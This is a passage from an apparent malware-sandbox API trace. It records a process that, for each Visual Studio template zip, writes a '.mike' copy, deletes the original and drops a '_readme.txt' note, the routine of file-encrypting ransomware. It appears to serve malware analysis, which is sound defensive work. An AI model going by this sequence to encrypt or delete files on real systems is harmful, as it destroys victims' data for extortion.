ftCreationTime.dwLowDateTime=0x15aa5620, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x15aa5620, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x15bd6120, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x490)) returned 1 [0128.254] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip", nBufferLength=0x105, lpBuffer=0x2aeb94, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip", lpFilePart=0x0) returned 0x71 [0128.254] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip.mike", nBufferLength=0x105, lpBuffer=0x2aebb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip.mike", lpFilePart=0x0) returned 0x76 [0128.255] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip.mike" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\appconfiginternal.zip.mike"), fInfoLevelId=0x0, lpFileInformation=0x21ba168 | out: lpFileInformation=0x21ba168*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15aa5620, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x15aa5620, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x15bd6120, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x490)) returned 1 [0128.255] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip", lpFilePart=0x0) returned 0x71 [0128.255] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip", dwFileAttributes=0x80) returned 1 [0128.255] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip", nBufferLength=0x105, lpBuffer=0x2aebc0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip", lpFilePart=0x0) returned 0x71 [0128.255] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\appconfiginternal.zip")) returned 1 [0128.256] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip", nBufferLength=0x105, lpBuffer=0x2aebb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip", lpFilePart=0x0) returned 0x71 [0128.256] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\appconfiginternal.zip"), fInfoLevelId=0x0, lpFileInformation=0x2af094 | out: lpFileInformation=0x2af094*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0128.256] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip", nBufferLength=0x105, lpBuffer=0x2aeb94, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip", lpFilePart=0x0) returned 0x71 [0128.256] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea54, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\_readme.txt", lpFilePart=0x0) returned 0x67 [0128.257] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\_readme.txt" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x288 [0128.257] GetFileType (hFile=0x288) returned 0x1 [0128.258] GetFileType (hFile=0x288) returned 0x1 [0128.258] WriteFile (in: hFile=0x288, lpBuffer=0x21bc0f0*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2aefe0, lpOverlapped=0x0 | out: lpBuffer=0x21bc0f0*, lpNumberOfBytesWritten=0x2aefe0*=0x45e, lpOverlapped=0x0) returned 1 [0128.258] CloseHandle (hObject=0x288) returned 1 [0128.259] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip", nBufferLength=0x105, lpBuffer=0x2aeb8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip", lpFilePart=0x0) returned 0x6c [0128.259] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip", nBufferLength=0x105, lpBuffer=0x2aeb08, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip", lpFilePart=0x0) returned 0x6c [0128.259] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\assemblyinfo.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0128.261] GetFileType (hFile=0x288) returned 0x1 [0128.261] GetFileType (hFile=0x288) returned 0x1 [0128.261] CloseHandle (hObject=0x288) returned 1 [0128.261] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip", nBufferLength=0x105, lpBuffer=0x2aeb8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip", lpFilePart=0x0) returned 0x6c [0128.261] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip", nBufferLength=0x105, lpBuffer=0x2aebb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip", lpFilePart=0x0) returned 0x6c [0128.261] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aeb3c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0128.262] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0128.262] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\assemblyinfo.zip"), fInfoLevelId=0x0, lpFileInformation=0x21be23c | out: lpFileInformation=0x21be23c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c501900, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x10f5dcf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8c501900, ftLastWriteTime.dwHighDateTime=0x1c9e43c, nFileSizeHigh=0x0, nFileSizeLow=0x492)) returned 1 [0128.262] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip", nBufferLength=0x105, lpBuffer=0x2aebb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip", lpFilePart=0x0) returned 0x6c [0128.262] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\assemblyinfo.zip"), fInfoLevelId=0x0, lpFileInformation=0x21be5f8 | out: lpFileInformation=0x21be5f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c501900, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x10f5dcf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8c501900, ftLastWriteTime.dwHighDateTime=0x1c9e43c, nFileSizeHigh=0x0, nFileSizeLow=0x492)) returned 1 [0128.262] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip", nBufferLength=0x105, lpBuffer=0x2aeb94, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip", lpFilePart=0x0) returned 0x6c [0128.263] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip.mike", nBufferLength=0x105, lpBuffer=0x2aebb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip.mike", lpFilePart=0x0) returned 0x71 [0128.263] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip.mike" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\assemblyinfo.zip.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af094 | out: lpFileInformation=0x2af094*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0128.263] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip", lpFilePart=0x0) returned 0x6c [0128.263] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip", lpFilePart=0x0) returned 0x6c [0128.263] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip", nBufferLength=0x105, lpBuffer=0x2aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip", lpFilePart=0x0) returned 0x6c [0128.263] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip.mike", nBufferLength=0x105, lpBuffer=0x2aeb20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip.mike", lpFilePart=0x0) returned 0x71 [0128.263] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip.mike" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\assemblyinfo.zip.mike"), fInfoLevelId=0x0, lpFileInformation=0x2aeffc | out: lpFileInformation=0x2aeffc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0128.264] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip.mike", nBufferLength=0x105, lpBuffer=0x2aea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip.mike", lpFilePart=0x0) returned 0x71 [0128.264] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip.mike" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\assemblyinfo.zip.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0128.264] GetFileType (hFile=0x288) returned 0x1 [0128.264] GetFileType (hFile=0x288) returned 0x1 [0128.264] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aeef0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aeef0*=0) returned 0x0 [0128.265] WriteFile (in: hFile=0x288, lpBuffer=0x21bf8ac*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2aef9c, lpOverlapped=0x0 | out: lpBuffer=0x21bf8ac*, lpNumberOfBytesWritten=0x2aef9c*=0x220, lpOverlapped=0x0) returned 1 [0128.265] CloseHandle (hObject=0x288) returned 1 [0128.266] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\assemblyinfo.zip"), fInfoLevelId=0x0, lpFileInformation=0x21bf2c0 | out: lpFileInformation=0x21bf2c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c501900, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x10f5dcf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8c501900, ftLastWriteTime.dwHighDateTime=0x1c9e43c, nFileSizeHigh=0x0, nFileSizeLow=0x492)) returned 1 [0128.266] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip", nBufferLength=0x105, lpBuffer=0x2aea18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip", lpFilePart=0x0) returned 0x6c [0128.266] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\assemblyinfo.zip"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0128.266] GetFileType (hFile=0x288) returned 0x1 [0128.267] GetFileType (hFile=0x288) returned 0x1 [0128.267] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef9c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2aef9c*=0) returned 0x0 [0128.267] ReadFile (in: hFile=0x288, lpBuffer=0x21c0a2c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2aefa8, lpOverlapped=0x0 | out: lpBuffer=0x21c0a2c*, lpNumberOfBytesRead=0x2aefa8*=0x492, lpOverlapped=0x0) returned 1 [0128.268] CloseHandle (hObject=0x288) returned 1 [0128.269] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip.mike" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\assemblyinfo.zip.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0128.269] GetFileType (hFile=0x288) returned 0x1 [0128.269] GetFileType (hFile=0x288) returned 0x1 [0128.269] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aeef0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aeef0*=0) returned 0x220 [0128.269] WriteFile (in: hFile=0x288, lpBuffer=0x21c54d0*, nNumberOfBytesToWrite=0x4a0, lpNumberOfBytesWritten=0x2aef9c, lpOverlapped=0x0 | out: lpBuffer=0x21c54d0*, lpNumberOfBytesWritten=0x2aef9c*=0x4a0, lpOverlapped=0x0) returned 1 [0128.269] CloseHandle (hObject=0x288) returned 1 [0128.269] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip.mike", nBufferLength=0x105, lpBuffer=0x2aea30, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip.mike", lpFilePart=0x0) returned 0x71 [0128.270] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip.mike" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\assemblyinfo.zip.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0128.270] GetFileType (hFile=0x288) returned 0x1 [0128.270] GetFileType (hFile=0x288) returned 0x1 [0128.271] WriteFile (in: hFile=0x288, lpBuffer=0x21c874c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2aefcc, lpOverlapped=0x0 | out: lpBuffer=0x21c874c*, lpNumberOfBytesWritten=0x2aefcc*=0x20c, lpOverlapped=0x0) returned 1 [0128.271] CloseHandle (hObject=0x288) returned 1 [0128.271] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip", nBufferLength=0x105, lpBuffer=0x2aeb94, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip", lpFilePart=0x0) returned 0x6c [0128.271] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip.mike", nBufferLength=0x105, lpBuffer=0x2aebb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip.mike", lpFilePart=0x0) returned 0x71 [0128.273] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip.mike" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\assemblyinfo.zip.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af094 | out: lpFileInformation=0x2af094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15bd6120, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x15bd6120, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x15bfc280, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x6c0)) returned 1 [0128.273] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip", nBufferLength=0x105, lpBuffer=0x2aeb94, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip", lpFilePart=0x0) returned 0x6c [0128.273] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip.mike", nBufferLength=0x105, lpBuffer=0x2aebb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip.mike", lpFilePart=0x0) returned 0x71 [0128.273] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip.mike" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\assemblyinfo.zip.mike"), fInfoLevelId=0x0, lpFileInformation=0x21ca130 | out: lpFileInformation=0x21ca130*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15bd6120, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x15bd6120, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x15bfc280, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x6c0)) returned 1 [0128.274] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip", lpFilePart=0x0) returned 0x6c [0128.274] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip", dwFileAttributes=0x80) returned 1 [0128.274] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip", nBufferLength=0x105, lpBuffer=0x2aebc0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip", lpFilePart=0x0) returned 0x6c [0128.274] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\assemblyinfo.zip")) returned 1 [0128.277] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip", nBufferLength=0x105, lpBuffer=0x2aebb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip", lpFilePart=0x0) returned 0x6c [0128.277] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\assemblyinfo.zip"), fInfoLevelId=0x0, lpFileInformation=0x2af094 | out: 